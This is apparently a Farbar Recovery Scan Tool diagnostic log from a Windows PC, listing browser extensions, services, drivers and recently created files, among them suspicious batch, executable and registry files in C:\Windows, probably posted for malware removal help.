FF Extension: (Video Scrubber for Instagram) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\3mk9fbgv.default-1535656138801\Extensions\{a68cb35a-62b5-4786-99f4-3e435f6590aa}.xpi [2019-11-08]
FF ProfilePath: C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810 [2017-05-05]
FF Extension: (Avast SafePrice | Comparison, deals, coupons) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2019-02-19]
FF Extension: (Avast Online Security) - C:\Users\Vladana\AppData\Roaming\Mozilla\Firefox\Profiles\yzcmo8r9.default-1474756565810\Extensions\[email protected] [2018-07-17]
FF HKLM-x32\...\Firefox\Extensions: [{ABDE892B-13A8-4d1b-88E6-365A6E755758}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF Extension: (RealDownloader) - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext [2014-11-24] [Legacy] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{338950EA-82DB-44C1-930D-0C28E023C9F0}] - C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\Firefox\Ext
FF HKU\S-1-5-21-7682389-3612777877-391866582-1000\...\Firefox\Extensions: [[email protected]] - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi
FF Extension: (KeepVid Pro) - C:\Program Files (x86)\KeepVid\KeepVid Pro\BrowserPlugin\[email protected]_xpi [2017-09-02] [Legacy]
FF Plugin: @adobe.com/FlashPlayer -> C:\Windows\system32\Macromed\Flash\NPSWF64_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\Windows\SysWOW64\Macromed\Flash\NPSWF32_32_0_0_293.dll [2019-11-13] (Adobe Inc. -> )
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1234204.dll [2018-06-06] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @ASC/FileLabPlugin;version=1.1.33 -> C:\ProgramData\FileLab\Plugin\Framework\npFlPluginS.dll [2012-02-20] (Ascensio System SIA -> FileLab) [File not signed]
FF Plugin-x32: @divx.com/DivX Web Player Plug-In,version=1.0.0 -> C:\Program Files (x86)\DivX\DivX Web Player\npdivx32.dll [2017-11-21] (DivX, LLC -> DivX, LLC)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel® Identity Protection Technology Software -> Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\dtplugin\npDeployJava1.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.221.2 -> C:\Program Files (x86)\Java\jre1.8.0_221\bin\plugin2\npjp2.dll [2019-07-17] (Oracle America, Inc. -> Oracle Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3505.0912 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2012-09-12] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @nokia.com/EnablerPlugin -> C:\Program Files (x86)\Nokia\Nokia Suite\npNokiaSuiteEnabler.dll [2014-11-19] (Nokia ->  )
FF Plugin-x32: @real.com/nppl3260;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nppl3260.dll [2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprndlhtml5videoshim;version=17.0.15 -> C:\ProgramData\RealNetworks\RealDownloader\BrowserPlugins\MozillaPlugins\nprndlhtml5videoshim.dll [2014-10-26] (RealNetworks, Inc. -> RealNetworks, Inc.)
FF Plugin-x32: @real.com/nprpplugin;version=17.0.15.10 -> c:\program files (x86)\real\realplayer\Netscape6\nprpplugin.dll [2015-02-06] (RealNetworks, Inc. -> RealPlayer Cloud)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin-x32: @videolan.org/vlc,version=2.1.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.1.5 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.5.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=2.2.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.0 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.2 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.3 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.4 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.6 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.7.1 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: @videolan.org/vlc,version=3.0.8 -> C:\Program Files (x86)\VideoLAN\VLC\npvlc.dll [2019-08-14] (VideoLAN -> VideoLAN)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AIR\nppdf32.dll [2018-08-02] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=3 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @tools.google.com/Google Update;version=9 -> C:\Users\Vladana\AppData\Local\Google\Update\1.3.35.342\npGoogleUpdate3.dll [2019-11-05] (Google Inc -> Google LLC)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: @unity3d.com/UnityPlayer,version=1.0 -> C:\Users\Vladana\AppData\LocalLow\Unity\WebPlayer\loader\npUnity3D32.dll [2014-02-20] (Unity Technologies ApS -> Unity Technologies ApS)
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: pokki.com/PokkiDownloadHelper -> C:\Users\Vladana\AppData\Local\Pokki\Download Helper\npPokkiDownloadHelper.1.2.0.78.dll [No File]
FF Plugin HKU\S-1-5-21-7682389-3612777877-391866582-1000: torrents-time.com/TTPlugin -> C:\Program Files (x86)\TorrentsTime Media Player\bin\npTTPlugin.dll [No File]
 
Chrome: 
=======
CHR DefaultProfile: Profile 1
CHR HomePage: Profile 1 -> hxxps://www.google.com/webhp?complete=0&hl=en
CHR StartupUrls: Profile 1 -> "chrome://apps/"
CHR NewTab: Profile 1 ->  Not-active:"chrome-extension://eedlgdlajadkbbjoobobefphmfkcchfk/newtab.html"
CHR DefaultSearchURL: Profile 1 -> hxxps://www.ecosia.org/search?q={searchTerms}&addon=chrome&addonversion=2.1.0
CHR DefaultSearchKeyword: Profile 1 -> ecosia
CHR DefaultSuggestURL: Profile 1 -> hxxps://ac.ecosia.org/?q={searchTerms}&type=list&mkt=en_US
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Guest Profile [2018-09-06]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1 [2019-11-18]
CHR Extension: (Slides) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aapocclcgogkmnckokdopfmhonfmgoek [2018-09-06]
CHR Extension: (Docs) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\aohghmighlieiainnegkcijnfilokake [2018-09-06]
CHR Extension: (Google Drive) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\apdfllckaahabafndbhieahigkjlhalf [2018-10-17]
CHR Extension: (Video Progress Bar & Controls for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bhdahocbinakfolafliljfkgkdeemgcd [2019-01-07]
CHR Extension: (YouTube) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2018-09-06]
CHR Extension: (Facebook) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\boeajhmfdjldchidhphikilcgdacljfm [2018-09-06]
CHR Extension: (Chrome IG Story) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\bojgejgifofondahckoaahkilneffhmf [2019-02-16]
CHR Extension: (uBlock Origin) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\cjpalhdlnbpafiamejdnhcphjbkeiagm [2019-10-30]
CHR Extension: (Disable automatic tab discarding) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\dnhngfnfolbmhgealdpolmhimnoliiok [2019-09-26]
CHR Extension: (Ecosia Search) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\eedlgdlajadkbbjoobobefphmfkcchfk [2019-10-10]
CHR Extension: (Adobe Acrobat) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\efaidnbmnnnibpcajpcglclefindmkaj [2019-11-18]
CHR Extension: (ZenMate VPN - Best Cyber Security & Unblock) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fdcgdnkidjaadafnichfpabhfomcebme [2019-10-05]
CHR Extension: (Sheets) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\felcaaldnbdncclmgdcncolpebgiejap [2018-09-06]
CHR Extension: (Skyload - Music and video downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\fnmpfimijcopbiaiobinamadmnmhckmp [2019-08-23]
CHR Extension: (Emojis - Emoji Keyboard) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\gaoflciahikhligngeccdecgfjngejlh [2019-11-02]
CHR Extension: (Google Docs Offline) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi [2018-09-06]
CHR Extension: (Super Auto Refresh Plus) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\globgafddkdlnalejlkcpaefakkhkdoa [2019-10-19]
CHR Extension: (Stream Video Downloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\imkngaibigegepnlckfcbecjoilcjbhf [2019-10-15]
CHR Extension: (GoodTwitter) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\jbanhionoclikdjnjlcmefiofgjimgca [2019-10-05]
CHR Extension: (Penzu) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\khgpedpfmjojllfmmhfabemdelhncneo [2018-09-06]
CHR Extension: (Google Hangouts) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\knipolnnllmklapflnccelgolnpehhpl [2019-05-23]
CHR Extension: (Google Maps) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\lneaknkopdijkpnocmklfnjbeapigfbh [2018-09-06]
CHR Extension: (Twitter Video Downloader | Fast and Free) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nbkknbagklenkcienihfapbfpjemnfoi [2019-10-28]
CHR Extension: (IG Stories for Instagram™) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilbfjdbacfdodpbdondbbkmoigehodg [2019-10-15]
CHR Extension: (Slinky Modern) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nilnodhmmonndffbejancdeiggflcehi [2018-09-06]
CHR Extension: (Chrome Web Store Payments) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2019-10-05]
CHR Extension: (Spotify Music Dwnloader) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\oefdcdmhklplgdmendjfnjeiijgcmabi [2019-01-25]
CHR Extension: (Gmail) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2019-04-30]
CHR Extension: (Chrome Media Router) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\pkedcjkdefgpdelpbcmbmeomcjbeemfm [2019-10-24]
CHR Extension: (RightToCopy) - C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\Profile 1\Extensions\plmcimdddlobkphnofejmeidjblideca [2018-12-02]
CHR Profile: C:\Users\Vladana\AppData\Local\Google\Chrome\User Data\System Profile [2018-09-06]
CHR HKU\S-1-5-21-7682389-3612777877-391866582-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [dhdgffkkebhmkfjojejmpbldmpobfkfo] - hxxp://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj]
CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck]
CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - C:\Program Files\AVAST Software\Avast\WebRep\Chrome\aswWebRepChrome.crx <not found>
CHR HKLM-x32\...\Chrome\Extension: [jbolfgndggfhhpbnkgnpjkfhinclbigj] - <no Path/update_url>
 
Opera: 
=======
OPR DownloadDir: C:\Users\Vladana\Desktop
OPR StartupUrls: "hxxps://www.google.rs/webhp?complete=0&hl=en&gws_rd=cr&ei=2SN4VYC0FIHbsgHZ8IDQCA"
OPR Extension: (Tab Auto Refresh) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\filddmgeklidnenaibigmjeopkaccljm [2019-06-13]
OPR Extension: (Flash Video Downloader (FVD)) - C:\Users\Vladana\AppData\Roaming\Opera Software\Opera Stable\Extensions\neacgcjokggofibnbfapeaejhclmpple [2018-09-09]
 
==================== Services (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
S3 aswbIDSAgent; C:\Program Files\AVAST Software\Avast\aswidsagent.exe [6085360 2019-10-04] (AVAST Software s.r.o. -> AVAST Software)
R2 DTSAudioSvc; C:\Program Files\Realtek\Audio\HDA\DTSU2PAuSrv64.exe [225280 2011-08-05] (Microsoft Windows Hardware Compatibility Publisher -> DTS, Inc)
S2 Freemake Improver; C:\ProgramData\Freemake\FreemakeUtilsService\FreemakeUtilsService.exe [81280 2019-10-25] (Mixbyte Inc -> Freemake)
R2 FUJ02E3Service; C:\Program Files\Fujitsu\FUJ02E3\FUJ02E3.exe [76104 2011-11-23] (FUJITSU LIMITED -> FUJITSU LIMITED)
R2 jhi_service; C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\jhi_service.exe [165760 2012-07-17] (Intel Corporation -> Intel Corporation)
R2 MDM; C:\Program Files (x86)\Common Files\Microsoft Shared\VS7DEBUG\mdm.exe [335872 2006-10-26] (Microsoft Corporation) [File not signed]
S3 MyWiFiDHCPDNS; C:\Program Files\Intel\WiFi\bin\PanDhcpDns.exe [273168 2012-04-17] (Intel Corporation-Mobile Wireless Group -> )
R2 PFNService; C:\Program Files\Fujitsu\Plugfree NETWORK\PFNService.exe [2213376 2011-12-22] (FUJITSU LIMITED) [File not signed]
R2 PowerSavingUtilityService; C:\Program Files\Fujitsu\PSUtility\PSUService.exe [51608 2012-06-29] (FUJITSU LIMITED -> FUJITSU LIMITED)
S4 RealNetworks Downloader Resolver Service; C:\Program Files (x86)\RealNetworks\RealDownloader\rndlresolversvc.exe [39568 2014-10-26] (RealNetworks, Inc. -> )
S4 RealPlayer Cloud Service; c:\program files (x86)\real\realplayer\RPDS\Bin\rpdsvc.exe [1141848 2015-02-06] (RealNetworks, Inc. -> RealNetworks, Inc.)
S4 RealPlayerUpdateSvc; C:\Program Files (x86)\Real\UpdateService\RealPlayerUpdateSvc.exe [31856 2014-10-30] (RealNetworks, Inc. -> )
R2 Update service; C:\Program Files (x86)\Popcorn Time\Updater.exe [339968 2015-10-19] (Popcorn Time) [File not signed]
S4 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-14] (Microsoft Windows -> Microsoft Corporation)
R2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2292480 2012-07-17] (Microsoft Corporation -> Microsoft Corp.)
R2 ZeroConfigService; C:\Program Files\Intel\WiFi\bin\ZeroConfigService.exe [2671376 2012-04-17] (Intel Corporation-Mobile Wireless Group -> Intel® Corporation)
S3 WsDrvInst; C:\Program Files (x86)\iSkysoft\iSkysoft iTransfer\DriverInstall.exe [X]
 
===================== Drivers (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
R3 AMPPAL; C:\Windows\System32\DRIVERS\AMPPAL.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
S3 AMPPALP; C:\Windows\System32\DRIVERS\amppal.sys [195584 2012-03-01] (Microsoft Windows Hardware Compatibility Publisher -> Windows ® Win 7 DDK provider)
R0 aswArDisk; C:\Windows\System32\drivers\aswArDisk.sys [37616 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswArPot; C:\Windows\System32\drivers\aswArPot.sys [204824 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswbidsdriver; C:\Windows\System32\drivers\aswbidsdriver.sys [274456 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbidsh; C:\Windows\System32\drivers\aswbidsh.sys [209552 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswbuniv; C:\Windows\System32\drivers\aswbuniv.sys [65120 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswHdsKe; C:\Windows\System32\drivers\aswHdsKe.sys [276952 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswKbd; C:\Windows\System32\drivers\aswKbd.sys [42736 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswMonFlt; C:\Windows\System32\drivers\aswMonFlt.sys [171520 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswRdr; C:\Windows\System32\drivers\aswRdr2.sys [110320 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswRvrt; C:\Windows\System32\drivers\aswRvrt.sys [83792 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSnx; C:\Windows\System32\drivers\aswSnx.sys [848432 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 aswSP; C:\Windows\System32\drivers\aswSP.sys [460448 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R2 aswStm; C:\Windows\System32\drivers\aswStm.sys [236024 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R0 aswVmm; C:\Windows\System32\drivers\aswVmm.sys [316528 2019-10-03] (AVAST Software s.r.o. -> AVAST Software)
R1 ESProtectionDriver; C:\Windows\system32\drivers\mbae64.sys [76192 2018-03-19] (Malwarebytes Corporation -> )
R0 FBIOSDRV; C:\Windows\System32\Drivers\FBIOSDRV.sys [21104 2009-06-24] (FUJITSU LIMITED  -> FUJITSU LIMITED)
R3 FUJ02B1; C:\Windows\System32\DRIVERS\FUJ02B1.sys [7808 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R3 FUJ02E3; C:\Windows\System32\DRIVERS\FUJ02E3.sys [7296 2006-11-01] (Microsoft Windows Hardware Compatibility Publisher -> FUJITSU LIMITED)
R2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [193768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMFarflt; C:\Windows\System32\DRIVERS\farflt.sys [112864 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMProtection; C:\Windows\System32\DRIVERS\mbam.sys [44768 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [253664 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 MBAMWebProtection; C:\Windows\System32\DRIVERS\mwac.sys [93816 2019-10-05] (Malwarebytes Corporation -> Malwarebytes)
S3 nmwcd; C:\Windows\System32\drivers\ccdcmbx64.sys [19968 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdc; C:\Windows\System32\drivers\ccdcmbox64.sys [27136 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsucx64; C:\Windows\System32\drivers\nmwcdnsucx64.sys [12800 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 nmwcdnsux64; C:\Windows\System32\drivers\nmwcdnsux64.sys [171008 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R2 npf; C:\Windows\system32\drivers\npf.sys [36600 2017-01-02] (Riverbed Technology, Inc. -> Riverbed Technology, Inc.)
S3 pccsmcfd; C:\Windows\System32\DRIVERS\pccsmcfdx64.sys [26112 2012-10-17] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
R3 SNP2UVC; C:\Windows\System32\DRIVERS\snp2uvc.sys [1812608 2011-12-27] (Microsoft Windows Hardware Compatibility Publisher -> )
R0 sptd; C:\Windows\System32\Drivers\sptd.sys [834544 2013-02-20] () [File not signed]
S3 tap0901; C:\Windows\System32\DRIVERS\tap0901.sys [27136 2016-04-21] (OpenVPN Technologies, Inc. -> The OpenVPN Project)
S3 upperdev; C:\Windows\System32\DRIVERS\usbser_lowerfltx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
S3 UsbserFilt; C:\Windows\System32\DRIVERS\usbser_lowerfltjx64.sys [9216 2013-01-23] (Microsoft Windows Hardware Compatibility Publisher -> Nokia)
U3 ax0s195n; C:\Windows\System32\Drivers\ax0s195n.sys [0 0000-00-00] (Microsoft Corporation) <==== ATTENTION (zero byte File/Folder)
U4 ekrn; no ImagePath
S3 taphss6; system32\DRIVERS\taphss6.sys [X]
S3 vmci; \SystemRoot\system32\DRIVERS\vmci.sys [X]
S3 VMnetAdapter; system32\DRIVERS\vmnetadapter.sys [X]
 
==================== NetSvcs (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
 
==================== One month (created) ===================
 
(If an entry is included in the fixlist, the file/folder will be moved.)
 
2019-11-18 20:43 - 2019-11-18 20:43 - 000003370 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-18 20:43 - 2019-11-18 20:43 - 000003240 _____ C:\Windows\system32\Tasks\RealDownloaderRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-18 19:52 - 2019-11-18 19:53 - 000010340 _____ C:\Users\Vladana\Desktop\Fixlog.txt
2019-11-18 19:25 - 2019-11-18 19:53 - 000008593 _____ C:\Users\Vladana\Desktop\fixlist.txt
2019-11-18 14:53 - 2019-11-18 20:55 - 000046095 _____ C:\Users\Vladana\Desktop\FRST.txt
2019-11-18 14:24 - 2019-11-18 20:54 - 000000000 ____D C:\FRST
2019-11-18 14:22 - 2019-11-18 14:52 - 002260480 _____ (Farbar) C:\Users\Vladana\Desktop\FRST64.exe
2019-11-17 00:17 - 2019-10-21 20:51 - 000002930 _____ C:\Windows\e.bat
2019-11-17 00:17 - 2019-07-30 17:00 - 000004608 _____ () C:\Windows\e.exe
2019-11-17 00:16 - 2019-09-12 17:27 - 000025600 _____ () C:\Windows\fr.exe
2019-11-16 17:33 - 2019-11-16 17:45 - 000000000 ____D C:\Users\Vladana\AppData\Local\CrashDumps
2019-11-16 16:40 - 2019-11-18 19:26 - 000000000 ____D C:\ProgramData\Hotspot Shield
2019-11-16 16:39 - 2019-11-16 16:39 - 000000000 ____D C:\Users\Vladana\AppData\Local\Turbo.net
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\Wget
2019-11-16 16:28 - 2019-11-16 16:28 - 000000000 ____D C:\Windows\curl
2019-11-16 16:28 - 2019-10-12 19:40 - 000004608 _____ () C:\Windows\d.exe
2019-11-16 16:28 - 2019-09-12 15:16 - 000001241 _____ C:\Windows\d.bat
2019-11-16 16:28 - 2019-08-09 16:30 - 000000001 _____ C:\Windows\y.txt
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_n.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000302 _____ C:\Windows\mgr_f.reg
2019-11-16 16:28 - 2019-08-09 15:28 - 000000290 _____ C:\Windows\e.reg
2019-11-16 16:21 - 2019-11-16 16:21 - 000000000 ____D C:\Users\Vladana\Documents\Visual Studio 2005
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\Users\Public\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000001276 _____ C:\ProgramData\Desktop\Freemake Video Converter.lnk
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 15:55 - 2019-11-16 15:55 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Freemake
2019-11-16 14:14 - 2019-11-16 14:14 - 000001216 _____ C:\Users\Vladana\Desktop\4K Video Downloader.lnk
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\4K Video Downloader
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Users\Vladana\AppData\Local\4kdownload.com
2019-11-16 14:14 - 2019-11-16 14:14 - 000000000 ____D C:\Program Files (x86)\4KDownload
2019-11-15 19:03 - 2019-11-17 00:15 - 000000000 ____D C:\Users\Vladana\AppData\Local\ZenMate
2019-11-11 01:34 - 2019-11-18 01:34 - 000003348 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeScheduledTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-11 01:34 - 2019-11-18 01:34 - 000003218 _____ C:\Windows\system32\Tasks\RealPlayerRealUpgradeLogonTaskS-1-5-21-7682389-3612777877-391866582-1000
2019-11-08 21:02 - 2019-11-11 01:28 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\Users\Public\Desktop\Mp3tag.lnk
2019-10-22 01:05 - 2019-10-22 01:05 - 000000935 _____ C:\ProgramData\Desktop\Mp3tag.lnk
 
